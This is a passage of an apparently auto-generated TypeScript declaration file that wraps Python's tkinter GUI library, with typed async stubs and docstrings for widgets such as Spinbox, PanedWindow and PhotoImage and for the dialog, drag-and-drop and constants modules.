*/\n\t\twindow_names(): Promise<any>\n\t\twindow_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Obsolete function, use see.\n\t\t */\n\t\tyview_pickplace(): Promise<any>\n\t\tyview_pickplace$($: {}): Promise<any>\n\t\ttag_config\n\t\twindow_config\n\t}\n\n\t/**\n\t * Internal class. It wraps the command in the widget OptionMenu.\n\t */\n\tinterface I_setit {\n\t}\n\n\t/**\n\t * OptionMenu which allows the user to select a value from a menu.\n\t */\n\n\t/**\n\t * Construct an optionmenu widget with the parent MASTER, with\n\t * the resource textvariable set to VARIABLE, the initially selected\n\t * value VALUE, the other menu values VALUES and an additional\n\t * keyword argument command.\n\t */\n\tfunction OptionMenu(master, variable, value): Promise<IOptionMenu>\n\tfunction OptionMenu$({ master, variable, value }): Promise<IOptionMenu>\n\tinterface IOptionMenu extends IMenubutton {\n\n\t\t/**\n\t\t * Destroy this widget and the associated menu.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Base class for images.\n\t */\n\tfunction Image(imgtype, name?, cnf?, master?): Promise<IImage>\n\tfunction Image$({ imgtype, name, cnf, master }: { imgtype, name?, cnf?, master?}): Promise<IImage>\n\tinterface IImage {\n\n\t\t/**\n\t\t * Configure the image.\n\t\t */\n\t\tconfigure(): Promise<any>\n\t\tconfigure$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the height of the image.\n\t\t */\n\t\theight(): Promise<any>\n\t\theight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the type of the image, e.g. \"photo\" or \"bitmap\".\n\t\t */\n\t\ttype(): Promise<any>\n\t\ttype$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the width of the image.\n\t\t */\n\t\twidth(): Promise<any>\n\t\twidth$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Widget which can display images in PGM, PPM, GIF, PNG format.\n\t */\n\n\t/**\n\t * Create an image with NAME.\n\t * \n\t * Valid resource names: data, format, file, gamma, height, palette,\n\t * width.\n\t */\n\tfunction PhotoImage(name?, cnf?, master?): Promise<IPhotoImage>\n\tfunction PhotoImage$({ name, cnf, master }: { name?, cnf?, master?}): Promise<IPhotoImage>\n\tinterface IPhotoImage extends IImage {\n\n\t\t/**\n\t\t * Display a transparent image.\n\t\t */\n\t\tblank(): Promise<any>\n\t\tblank$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the value of OPTION.\n\t\t */\n\t\tcget(option): Promise<any>\n\t\tcget$({ option }): Promise<any>\n\n\t\t/**\n\t\t * Return a new PhotoImage with the same image as this widget.\n\t\t */\n\t\tcopy(): Promise<any>\n\t\tcopy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a new PhotoImage with the same image as this widget\n\t\t * but zoom it with a factor of x in the X direction and y in the Y\n\t\t * direction. If y is not given, the default value is the same as x.\n\t\t * \n\t\t */\n\t\tzoom(x, y?): Promise<any>\n\t\tzoom$({ x, y }: { x, y?}): Promise<any>\n\n\t\t/**\n\t\t * Return a new PhotoImage based on the same image as this widget\n\t\t * but use only every Xth or Yth pixel. If y is not given, the\n\t\t * default value is the same as x.\n\t\t * \n\t\t */\n\t\tsubsample(x, y?): Promise<any>\n\t\tsubsample$({ x, y }: { x, y?}): Promise<any>\n\n\t\t/**\n\t\t * Return the color (red, green, blue) of the pixel at X,Y.\n\t\t */\n\t\tget(x, y): Promise<any>\n\t\tget$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Put row formatted colors to image starting from\n\t\t * position TO, e.g. 
image.put(\"{red green} {blue yellow}\", to=(4,6))\n\t\t */\n\t\tput(data, to?): Promise<any>\n\t\tput$({ data, to }: { data, to?}): Promise<any>\n\n\t\t/**\n\t\t * Write image to file FILENAME in FORMAT starting from\n\t\t * position FROM_COORDS.\n\t\t */\n\t\twrite(filename, format?, from_coords?): Promise<any>\n\t\twrite$({ filename, format, from_coords }: { filename, format?, from_coords?}): Promise<any>\n\n\t\t/**\n\t\t * Return True if the pixel at x,y is transparent.\n\t\t */\n\t\ttransparency_get(x, y): Promise<any>\n\t\ttransparency_get$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Set the transparency of the pixel at x,y.\n\t\t */\n\t\ttransparency_set(x, y, boolean): Promise<any>\n\t\ttransparency_set$({ x, y, boolean }): Promise<any>\n\t}\n\n\t/**\n\t * Widget which can display images in XBM format.\n\t */\n\n\t/**\n\t * Create a bitmap with NAME.\n\t * \n\t * Valid resource names: background, data, file, foreground, maskdata, maskfile.\n\t */\n\tfunction BitmapImage(name?, cnf?, master?): Promise<IBitmapImage>\n\tfunction BitmapImage$({ name, cnf, master }: { name?, cnf?, master?}): Promise<IBitmapImage>\n\tinterface IBitmapImage extends IImage {\n\t}\n\n\t/**\n\t * spinbox widget.\n\t */\n\n\t/**\n\t * Construct a spinbox widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * activebackground, background, borderwidth,\n\t * cursor, exportselection, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, insertbackground,\n\t * insertborderwidth, insertofftime,\n\t * insertontime, insertwidth, justify, relief,\n\t * repeatdelay, repeatinterval,\n\t * selectbackground, selectborderwidth\n\t * selectforeground, takefocus, textvariable\n\t * xscrollcommand.\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * buttonbackground, buttoncursor,\n\t * buttondownrelief, buttonuprelief,\n\t * command, disabledbackground,\n\t * disabledforeground, format, from,\n\t * invalidcommand, increment,\n\t * readonlybackground, state, to,\n\t * validate, validatecommand values,\n\t * width, wrap,\n\t * \n\t */\n\tfunction Spinbox(master?, cnf?): Promise<ISpinbox>\n\tfunction Spinbox$({ master, cnf }: { master?, cnf?}): Promise<ISpinbox>\n\tinterface ISpinbox extends IWidget, IXView {\n\n\t\t/**\n\t\t * Return a tuple of X1,Y1,X2,Y2 coordinates for a\n\t\t * rectangle which encloses the character given by index.\n\t\t * \n\t\t * The first two elements of the list give the x and y\n\t\t * coordinates of the upper-left corner of the screen\n\t\t * area covered by the character (in pixels relative\n\t\t * to the widget) and the last two elements give the\n\t\t * width and height of the character, in pixels. The\n\t\t * bounding box may refer to a region outside the\n\t\t * visible area of the window.\n\t\t * \n\t\t */\n\t\tbbox(index): Promise<any>\n\t\tbbox$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Delete one or more elements of the spinbox.\n\t\t * \n\t\t * First is the index of the first character to delete,\n\t\t * and last is the index of the character just after\n\t\t * the last one to delete. If last isn't specified it\n\t\t * defaults to first+1, i.e. a single character is\n\t\t * deleted. 
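For example, `await sb.delete(0, 'end')`, with `sb` an\n\t\t * assumed ISpinbox instance, would clear the entire entry. 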
This command returns an empty string.\n\t\t * \n\t\t */\n\t\tdelete(first, last?): Promise<any>\n\t\tdelete$({ first, last }: { first, last?}): Promise<any>\n\n\t\t/**\n\t\t * Returns the spinbox's string\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Alter the position of the insertion cursor.\n\t\t * \n\t\t * The insertion cursor will be displayed just before\n\t\t * the character given by index. Returns an empty string\n\t\t * \n\t\t */\n\t\ticursor(index): Promise<any>\n\t\ticursor$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Returns the name of the widget at position x, y\n\t\t * \n\t\t * Return value is one of: none, buttondown, buttonup, entry\n\t\t * \n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Returns the numerical index corresponding to index\n\t\t * \n\t\t */\n\t\tindex(index): Promise<any>\n\t\tindex$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Insert string s at index\n\t\t * \n\t\t * Returns an empty string.\n\t\t * \n\t\t */\n\t\tinsert(index, s): Promise<any>\n\t\tinsert$({ index, s }): Promise<any>\n\n\t\t/**\n\t\t * Causes the specified element to be invoked\n\t\t * \n\t\t * The element could be buttondown or buttonup\n\t\t * triggering the action associated with it.\n\t\t * \n\t\t */\n\t\tinvoke(element): Promise<any>\n\t\tinvoke$({ element }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tscan(): Promise<any>\n\t\tscan$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Records x and the current view in the spinbox window;\n\t\t * \n\t\t * used in conjunction with later scan dragto commands.\n\t\t * Typically this command is associated with a mouse button\n\t\t * press in the widget. It returns an empty string.\n\t\t * \n\t\t */\n\t\tscan_mark(x): Promise<any>\n\t\tscan_mark$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Compute the difference between the given x argument\n\t\t * and the x argument to the last scan mark command\n\t\t * \n\t\t * It then adjusts the view left or right by 10 times the\n\t\t * difference in x-coordinates. This command is typically\n\t\t * associated with mouse motion events in the widget, to\n\t\t * produce the effect of dragging the spinbox at high speed\n\t\t * through the window. The return value is an empty string.\n\t\t * \n\t\t */\n\t\tscan_dragto(x): Promise<any>\n\t\tscan_dragto$({ x }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tselection(): Promise<any>\n\t\tselection$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Locate the end of the selection nearest to the character\n\t\t * given by index,\n\t\t * \n\t\t * Then adjust that end of the selection to be at index\n\t\t * (i.e including but not going beyond index). The other\n\t\t * end of the selection is made the anchor point for future\n\t\t * select to commands. 
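For example, `await sb.selection_adjust('end')`\n\t\t * (with `sb` an assumed ISpinbox instance) would extend the selection\n\t\t * through the end of the entry. 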
If the selection isn't currently in\n\t\t * the spinbox, then a new selection is created to include\n\t\t * the characters between index and the most recent selection\n\t\t * anchor point, inclusive.\n\t\t * \n\t\t */\n\t\tselection_adjust(index): Promise<any>\n\t\tselection_adjust$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Clear the selection\n\t\t * \n\t\t * If the selection isn't in this widget then the\n\t\t * command has no effect.\n\t\t * \n\t\t */\n\t\tselection_clear(): Promise<any>\n\t\tselection_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Sets or gets the currently selected element.\n\t\t * \n\t\t * If a spinbutton element is specified, it will be\n\t\t * displayed depressed.\n\t\t * \n\t\t */\n\t\tselection_element(element?): Promise<any>\n\t\tselection_element$({ element }: { element?}): Promise<any>\n\n\t\t/**\n\t\t * Set the fixed end of a selection to INDEX.\n\t\t */\n\t\tselection_from(index): Promise<any>\n\t\tselection_from$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Return True if there are characters selected in the spinbox, False\n\t\t * otherwise.\n\t\t */\n\t\tselection_present(): Promise<any>\n\t\tselection_present$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set the selection from START to END (not included).\n\t\t */\n\t\tselection_range(start, end): Promise<any>\n\t\tselection_range$({ start, end }): Promise<any>\n\n\t\t/**\n\t\t * Set the variable end of a selection to INDEX.\n\t\t */\n\t\tselection_to(index): Promise<any>\n\t\tselection_to$({ index }): Promise<any>\n\t}\n\n\t/**\n\t * labelframe widget.\n\t */\n\n\t/**\n\t * Construct a labelframe widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * borderwidth, cursor, font, foreground,\n\t * highlightbackground, highlightcolor,\n\t * highlightthickness, padx, pady, relief,\n\t * takefocus, text\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * background, class, colormap, container,\n\t * height, labelanchor, labelwidget,\n\t * visual, width\n\t * \n\t */\n\tfunction LabelFrame(master?, cnf?): Promise<ILabelFrame>\n\tfunction LabelFrame$({ master, cnf }: { master?, cnf?}): Promise<ILabelFrame>\n\tinterface ILabelFrame extends IWidget {\n\t}\n\n\t/**\n\t * panedwindow widget.\n\t */\n\n\t/**\n\t * Construct a panedwindow widget with the parent MASTER.\n\t * \n\t * STANDARD OPTIONS\n\t * \n\t * background, borderwidth, cursor, height,\n\t * orient, relief, width\n\t * \n\t * WIDGET-SPECIFIC OPTIONS\n\t * \n\t * handlepad, handlesize, opaqueresize,\n\t * sashcursor, sashpad, sashrelief,\n\t * sashwidth, showhandle,\n\t * \n\t */\n\tfunction PanedWindow(master?, cnf?): Promise<IPanedWindow>\n\tfunction PanedWindow$({ master, cnf }: { master?, cnf?}): Promise<IPanedWindow>\n\tinterface IPanedWindow extends IWidget {\n\n\t\t/**\n\t\t * Add a child widget to the panedwindow in a new pane.\n\t\t * \n\t\t * The child argument is the name of the child widget\n\t\t * followed by pairs of arguments that specify how to\n\t\t * manage the windows. 
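For example (a minimal\n\t\t * hypothetical sketch; `root` and `label` are assumed to already exist,\n\t\t * e.g. from this bridge's Tk and Label constructors):\n\t\t * \n\t\t *     const pw = await PanedWindow(root, { orient: 'horizontal' })\n\t\t *     await pw.add(label)\n\t\t * \n\t\t * 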
The possible options and values\n\t\t * are the ones accepted by the paneconfigure method.\n\t\t * \n\t\t */\n\t\tadd(child): Promise<any>\n\t\tadd$({ child }): Promise<any>\n\n\t\t/**\n\t\t * Remove the pane containing child from the panedwindow\n\t\t * \n\t\t * All geometry management options for child will be forgotten.\n\t\t * \n\t\t */\n\t\tremove(child): Promise<any>\n\t\tremove$({ child }): Promise<any>\n\n\t\t/**\n\t\t * Identify the panedwindow component at point x, y\n\t\t * \n\t\t * If the point is over a sash or a sash handle, the result\n\t\t * is a two element list containing the index of the sash or\n\t\t * handle, and a word indicating whether it is over a sash\n\t\t * or a handle, such as {0 sash} or {2 handle}. If the point\n\t\t * is over any other part of the panedwindow, the result is\n\t\t * an empty list.\n\t\t * \n\t\t */\n\t\tidentify(x, y): Promise<any>\n\t\tidentify$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tproxy(): Promise<any>\n\t\tproxy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x and y pair of the most recent proxy location\n\t\t * \n\t\t */\n\t\tproxy_coord(): Promise<any>\n\t\tproxy_coord$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Remove the proxy from the display.\n\t\t * \n\t\t */\n\t\tproxy_forget(): Promise<any>\n\t\tproxy_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Place the proxy at the given x and y coordinates.\n\t\t * \n\t\t */\n\t\tproxy_place(x, y): Promise<any>\n\t\tproxy_place$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t */\n\t\tsash(): Promise<any>\n\t\tsash$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the current x and y pair for the sash given by index.\n\t\t * \n\t\t * Index must be an integer between 0 and 1 less than the\n\t\t * number of panes in the panedwindow. The coordinates given are\n\t\t * those of the top left corner of the region containing the sash.\n\t\t * pathName sash dragto index x y This command computes the\n\t\t * difference between the given coordinates and the coordinates\n\t\t * given to the last sash coord command for the given sash. It then\n\t\t * moves that sash the computed difference. The return value is the\n\t\t * empty string.\n\t\t * \n\t\t */\n\t\tsash_coord(index): Promise<any>\n\t\tsash_coord$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Records x and y for the sash given by index;\n\t\t * \n\t\t * Used in conjunction with later dragto commands to move the sash.\n\t\t * \n\t\t */\n\t\tsash_mark(index): Promise<any>\n\t\tsash_mark$({ index }): Promise<any>\n\n\t\t/**\n\t\t * Place the sash given by index at the given coordinates\n\t\t * \n\t\t */\n\t\tsash_place(index, x, y): Promise<any>\n\t\tsash_place$({ index, x, y }): Promise<any>\n\n\t\t/**\n\t\t * Query a management option for window.\n\t\t * \n\t\t * Option may be any value allowed by the paneconfigure subcommand\n\t\t * \n\t\t */\n\t\tpanecget(child, option): Promise<any>\n\t\tpanecget$({ child, option }): Promise<any>\n\n\t\t/**\n\t\t * Query or modify the management options for window.\n\t\t * \n\t\t * If no option is specified, returns a list describing all\n\t\t * of the available options for pathName. If option is\n\t\t * specified with no value, then the command returns a list\n\t\t * describing the one named option (this list will be identical\n\t\t * to the corresponding sublist of the value returned if no\n\t\t * option is specified). 
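For example,\n\t\t * `await pw.paneconfigure(child, { sticky: 'nsew', minsize: 80 })`, a\n\t\t * hypothetical call, would both stretch the child in its pane and set a\n\t\t * lower bound on its size. 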
If one or more option-value pairs are\n\t\t * specified, then the command modifies the given widget\n\t\t * option(s) to have the given value(s); in this case the\n\t\t * command returns an empty string. The following options\n\t\t * are supported:\n\t\t * \n\t\t * after window\n\t\t * Insert the window after the window specified. window\n\t\t * should be the name of a window already managed by pathName.\n\t\t * before window\n\t\t * Insert the window before the window specified. window\n\t\t * should be the name of a window already managed by pathName.\n\t\t * height size\n\t\t * Specify a height for the window. The height will be the\n\t\t * outer dimension of the window including its border, if\n\t\t * any. If size is an empty string, or if -height is not\n\t\t * specified, then the height requested internally by the\n\t\t * window will be used initially; the height may later be\n\t\t * adjusted by the movement of sashes in the panedwindow.\n\t\t * Size may be any value accepted by Tk_GetPixels.\n\t\t * minsize n\n\t\t * Specifies that the size of the window cannot be made\n\t\t * less than n. This constraint only affects the size of\n\t\t * the widget in the paned dimension -- the x dimension\n\t\t * for horizontal panedwindows, the y dimension for\n\t\t * vertical panedwindows. May be any value accepted by\n\t\t * Tk_GetPixels.\n\t\t * padx n\n\t\t * Specifies a non-negative value indicating how much\n\t\t * extra space to leave on each side of the window in\n\t\t * the X-direction. The value may have any of the forms\n\t\t * accepted by Tk_GetPixels.\n\t\t * pady n\n\t\t * Specifies a non-negative value indicating how much\n\t\t * extra space to leave on each side of the window in\n\t\t * the Y-direction. The value may have any of the forms\n\t\t * accepted by Tk_GetPixels.\n\t\t * sticky style\n\t\t * If a window's pane is larger than the requested\n\t\t * dimensions of the window, this option may be used\n\t\t * to position (or stretch) the window within its pane.\n\t\t * Style is a string that contains zero or more of the\n\t\t * characters n, s, e or w. The string can optionally\n\t\t * contain spaces or commas, but they are ignored. Each\n\t\t * letter refers to a side (north, south, east, or west)\n\t\t * that the window will \"stick\" to. If both n and s\n\t\t * (or e and w) are specified, the window will be\n\t\t * stretched to fill the entire height (or width) of\n\t\t * its cavity.\n\t\t * width size\n\t\t * Specify a width for the window. The width will be\n\t\t * the outer dimension of the window including its\n\t\t * border, if any. If size is an empty string, or\n\t\t * if -width is not specified, then the width requested\n\t\t * internally by the window will be used initially; the\n\t\t * width may later be adjusted by the movement of sashes\n\t\t * in the panedwindow. 
Size may be any value accepted by\n\t\t * Tk_GetPixels.\n\t\t * \n\t\t * \n\t\t */\n\t\tpaneconfigure(tagOrId, cnf?): Promise<any>\n\t\tpaneconfigure$({ tagOrId, cnf }: { tagOrId, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Returns an ordered list of the child panes.\n\t\t */\n\t\tpanes(): Promise<any>\n\t\tpanes$($: {}): Promise<any>\n\t\tpaneconfig\n\t}\n\tlet TclError: Promise<any>\n\tlet wantobjects: Promise<any>\n\tlet TkVersion: Promise<any>\n\tlet TclVersion: Promise<any>\n\tlet READABLE: Promise<any>\n\tlet WRITABLE: Promise<any>\n\tlet EXCEPTION: Promise<any>\n\tmodule colorchooser {\n\t\tvar _\n\n\t\t/**\n\t\t * Display dialog window for selection of a color.\n\t\t * \n\t\t * Convenience wrapper for the Chooser class. Displays the color\n\t\t * chooser dialog with color as the initial value.\n\t\t * \n\t\t */\n\t\tfunction askcolor(color?): Promise<any>\n\t\tfunction askcolor$({ color }: { color?}): Promise<any>\n\n\t\t/**\n\t\t * Create a dialog for the tk_chooseColor command.\n\t\t * \n\t\t * Args:\n\t\t * master: The master widget for this dialog. If not provided,\n\t\t * defaults to options['parent'] (if defined).\n\t\t * options: Dictionary of options for the tk_chooseColor call.\n\t\t * initialcolor: Specifies the selected color when the\n\t\t * dialog is first displayed. This can be a tk color\n\t\t * string or a 3-tuple of ints in the range (0, 255)\n\t\t * for an RGB triplet.\n\t\t * parent: The parent window of the color dialog. The\n\t\t * color dialog is displayed on top of this.\n\t\t * title: A string for the title of the dialog box.\n\t\t * \n\t\t */\n\t\tinterface IChooser {\n\t\t\tcommand\n\t\t}\n\t}\n\tmodule commondialog {\n\t\tvar _\n\t\tfunction Dialog(master?): Promise<IDialog>\n\t\tfunction Dialog$({ master }: { master?}): Promise<IDialog>\n\t\tinterface IDialog {\n\t\t\tshow(): Promise<any>\n\t\t\tshow$($: {}): Promise<any>\n\t\t\tcommand\n\t\t}\n\t}\n\tmodule constants {\n\t\tvar _\n\t\tlet NO: Promise<any>\n\t\tlet FALSE: Promise<any>\n\t\tlet OFF: Promise<any>\n\t\tlet YES: Promise<any>\n\t\tlet TRUE: Promise<any>\n\t\tlet ON: Promise<any>\n\t\tlet N: Promise<any>\n\t\tlet S: Promise<any>\n\t\tlet W: Promise<any>\n\t\tlet E: Promise<any>\n\t\tlet NW: Promise<any>\n\t\tlet SW: Promise<any>\n\t\tlet NE: Promise<any>\n\t\tlet SE: Promise<any>\n\t\tlet NS: Promise<any>\n\t\tlet EW: Promise<any>\n\t\tlet NSEW: Promise<any>\n\t\tlet CENTER: Promise<any>\n\t\tlet NONE: Promise<any>\n\t\tlet X: Promise<any>\n\t\tlet Y: Promise<any>\n\t\tlet BOTH: Promise<any>\n\t\tlet LEFT: Promise<any>\n\t\tlet TOP: Promise<any>\n\t\tlet RIGHT: Promise<any>\n\t\tlet BOTTOM: Promise<any>\n\t\tlet RAISED: Promise<any>\n\t\tlet SUNKEN: Promise<any>\n\t\tlet FLAT: Promise<any>\n\t\tlet RIDGE: Promise<any>\n\t\tlet GROOVE: Promise<any>\n\t\tlet SOLID: Promise<any>\n\t\tlet HORIZONTAL: Promise<any>\n\t\tlet VERTICAL: Promise<any>\n\t\tlet NUMERIC: Promise<any>\n\t\tlet CHAR: Promise<any>\n\t\tlet WORD: Promise<any>\n\t\tlet BASELINE: Promise<any>\n\t\tlet INSIDE: Promise<any>\n\t\tlet OUTSIDE: Promise<any>\n\t\tlet SEL: Promise<any>\n\t\tlet SEL_FIRST: Promise<any>\n\t\tlet SEL_LAST: Promise<any>\n\t\tlet END: Promise<any>\n\t\tlet INSERT: Promise<any>\n\t\tlet CURRENT: Promise<any>\n\t\tlet ANCHOR: Promise<any>\n\t\tlet ALL: Promise<any>\n\t\tlet NORMAL: Promise<any>\n\t\tlet DISABLED: Promise<any>\n\t\tlet ACTIVE: Promise<any>\n\t\tlet HIDDEN: Promise<any>\n\t\tlet CASCADE: Promise<any>\n\t\tlet CHECKBUTTON: Promise<any>\n\t\tlet COMMAND: Promise<any>\n\t\tlet RADIOBUTTON: 
Promise<any>\n\t\tlet SEPARATOR: Promise<any>\n\t\tlet SINGLE: Promise<any>\n\t\tlet BROWSE: Promise<any>\n\t\tlet MULTIPLE: Promise<any>\n\t\tlet EXTENDED: Promise<any>\n\t\tlet DOTBOX: Promise<any>\n\t\tlet UNDERLINE: Promise<any>\n\t\tlet PIESLICE: Promise<any>\n\t\tlet CHORD: Promise<any>\n\t\tlet ARC: Promise<any>\n\t\tlet FIRST: Promise<any>\n\t\tlet LAST: Promise<any>\n\t\tlet BUTT: Promise<any>\n\t\tlet PROJECTING: Promise<any>\n\t\tlet ROUND: Promise<any>\n\t\tlet BEVEL: Promise<any>\n\t\tlet MITER: Promise<any>\n\t\tlet MOVETO: Promise<any>\n\t\tlet SCROLL: Promise<any>\n\t\tlet UNITS: Promise<any>\n\t\tlet PAGES: Promise<any>\n\t}\n\tmodule dialog {\n\t\tvar _\n\t\tfunction Dialog(master?, cnf?): Promise<IDialog>\n\t\tfunction Dialog$({ master, cnf }: { master?, cnf?}): Promise<IDialog>\n\t\tinterface IDialog {\n\t\t\tdestroy(): Promise<any>\n\t\t\tdestroy$($: {}): Promise<any>\n\t\t}\n\t\tlet DIALOG_ICON: Promise<any>\n\t\tlet t: Promise<any>\n\t\tlet q: Promise<any>\n\t}\n\tmodule dnd {\n\t\tvar _\n\t\tfunction dnd_start(source, event): Promise<any>\n\t\tfunction dnd_start$({ source, event }): Promise<any>\n\t\tfunction test(): Promise<any>\n\t\tfunction test$($: {}): Promise<any>\n\t\tfunction DndHandler(source, event): Promise<IDndHandler>\n\t\tfunction DndHandler$({ source, event }): Promise<IDndHandler>\n\t\tinterface IDndHandler {\n\t\t\ton_motion(event): Promise<any>\n\t\t\ton_motion$({ event }): Promise<any>\n\t\t\ton_release(event): Promise<any>\n\t\t\ton_release$({ event }): Promise<any>\n\t\t\tcancel(event?): Promise<any>\n\t\t\tcancel$({ event }: { event?}): Promise<any>\n\t\t\tfinish(event, commit?): Promise<any>\n\t\t\tfinish$({ event, commit }: { event, commit?}): Promise<any>\n\t\t\troot\n\t\t}\n\t\tfunction Icon(name): Promise<IIcon>\n\t\tfunction Icon$({ name }): Promise<IIcon>\n\t\tinterface IIcon {\n\t\t\tattach(canvas, x?, y?): Promise<any>\n\t\t\tattach$({ canvas, x, y }: { canvas, x?, y?}): Promise<any>\n\t\t\tdetach(): Promise<any>\n\t\t\tdetach$($: {}): Promise<any>\n\t\t\tpress(event): Promise<any>\n\t\t\tpress$({ event }): Promise<any>\n\t\t\tmove(event): Promise<any>\n\t\t\tmove$({ event }): Promise<any>\n\t\t\tputback(): Promise<any>\n\t\t\tputback$($: {}): Promise<any>\n\t\t\twhere(canvas, event): Promise<any>\n\t\t\twhere$({ canvas, event }): Promise<any>\n\t\t\tdnd_end(target, event): Promise<any>\n\t\t\tdnd_end$({ target, event }): Promise<any>\n\t\t}\n\t\tfunction Tester(root): Promise<ITester>\n\t\tfunction Tester$({ root }): Promise<ITester>\n\t\tinterface ITester {\n\t\t\tdnd_accept(source, event): Promise<any>\n\t\t\tdnd_accept$({ source, event }): Promise<any>\n\t\t\tdnd_enter(source, event): Promise<any>\n\t\t\tdnd_enter$({ source, event }): Promise<any>\n\t\t\tdnd_motion(source, event): Promise<any>\n\t\t\tdnd_motion$({ source, event }): Promise<any>\n\t\t\tdnd_leave(source, event): Promise<any>\n\t\t\tdnd_leave$({ source, event }): Promise<any>\n\t\t\tdnd_commit(source, event): Promise<any>\n\t\t\tdnd_commit$({ source, event }): Promise<any>\n\t\t}\n\t}\n\tmodule filedialog {\n\t\tvar _\n\n\t\t/**\n\t\t * Ask for a filename to open\n\t\t */\n\t\tfunction askopenfilename(): Promise<any>\n\t\tfunction askopenfilename$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a filename to save as\n\t\t */\n\t\tfunction asksaveasfilename(): Promise<any>\n\t\tfunction asksaveasfilename$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Ask for multiple filenames to open\n\t\t * \n\t\t * Returns a list of filenames or empty list if\n\t\t * cancel button 
selected\n\t\t * \n\t\t */\n\t\tfunction askopenfilenames(): Promise<any>\n\t\tfunction askopenfilenames$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a filename to open, and return the opened file\n\t\t */\n\t\tfunction askopenfile(mode?): Promise<any>\n\t\tfunction askopenfile$({ mode }: { mode?}): Promise<any>\n\n\t\t/**\n\t\t * Ask for multiple filenames and return the open file\n\t\t * objects\n\t\t * \n\t\t * returns a list of open file objects or an empty list if\n\t\t * cancel selected\n\t\t * \n\t\t */\n\t\tfunction askopenfiles(mode?): Promise<any>\n\t\tfunction askopenfiles$({ mode }: { mode?}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a filename to save as, and return the opened file\n\t\t */\n\t\tfunction asksaveasfile(mode?): Promise<any>\n\t\tfunction asksaveasfile$({ mode }: { mode?}): Promise<any>\n\n\t\t/**\n\t\t * Ask for a directory, and return the file name\n\t\t */\n\t\tfunction askdirectory(): Promise<any>\n\t\tfunction askdirectory$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Simple test program.\n\t\t */\n\t\tfunction test(): Promise<any>\n\t\tfunction test$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Standard file selection dialog -- no checks on selected file.\n\t\t * \n\t\t * Usage:\n\t\t * \n\t\t * d = FileDialog(master)\n\t\t * fname = d.go(dir_or_file, pattern, default, key)\n\t\t * if fname is None: ...canceled...\n\t\t * else: ...open file...\n\t\t * \n\t\t * All arguments to go() are optional.\n\t\t * \n\t\t * The 'key' argument specifies a key in the global dictionary\n\t\t * 'dialogstates', which keeps track of the values for the directory\n\t\t * and pattern arguments, overriding the values passed in (it does\n\t\t * not keep track of the default argument!). If no key is specified,\n\t\t * the dialog keeps no memory of previous state. Note that memory is\n\t\t * kept even when the dialog is canceled. 
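A TypeScript sketch of the\n\t\t * same flow (hypothetical usage; how this bridge module is imported\n\t\t * depends on the host project):\n\t\t * \n\t\t *     const d = await FileDialog(master)\n\t\t *     const fname = await d.go('/tmp', '*.txt')\n\t\t *     if (fname) { console.log('picked', fname) }\n\t\t * \n\t\t * 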
(All this emulates the\n\t\t * behavior of the Macintosh file selection dialogs.)\n\t\t * \n\t\t * \n\t\t */\n\t\tfunction FileDialog(master, title?): Promise<IFileDialog>\n\t\tfunction FileDialog$({ master, title }: { master, title?}): Promise<IFileDialog>\n\t\tinterface IFileDialog {\n\t\t\tgo(dir_or_file?, pattern?, def?, key?): Promise<any>\n\t\t\tgo$({ dir_or_file, pattern, def, key }: { dir_or_file?, pattern?, def?, key?}): Promise<any>\n\t\t\tquit(how?): Promise<any>\n\t\t\tquit$({ how }: { how?}): Promise<any>\n\t\t\tdirs_double_event(event): Promise<any>\n\t\t\tdirs_double_event$({ event }): Promise<any>\n\t\t\tdirs_select_event(event): Promise<any>\n\t\t\tdirs_select_event$({ event }): Promise<any>\n\t\t\tfiles_double_event(event): Promise<any>\n\t\t\tfiles_double_event$({ event }): Promise<any>\n\t\t\tfiles_select_event(event): Promise<any>\n\t\t\tfiles_select_event$({ event }): Promise<any>\n\t\t\tok_event(event): Promise<any>\n\t\t\tok_event$({ event }): Promise<any>\n\t\t\tok_command(): Promise<any>\n\t\t\tok_command$($: {}): 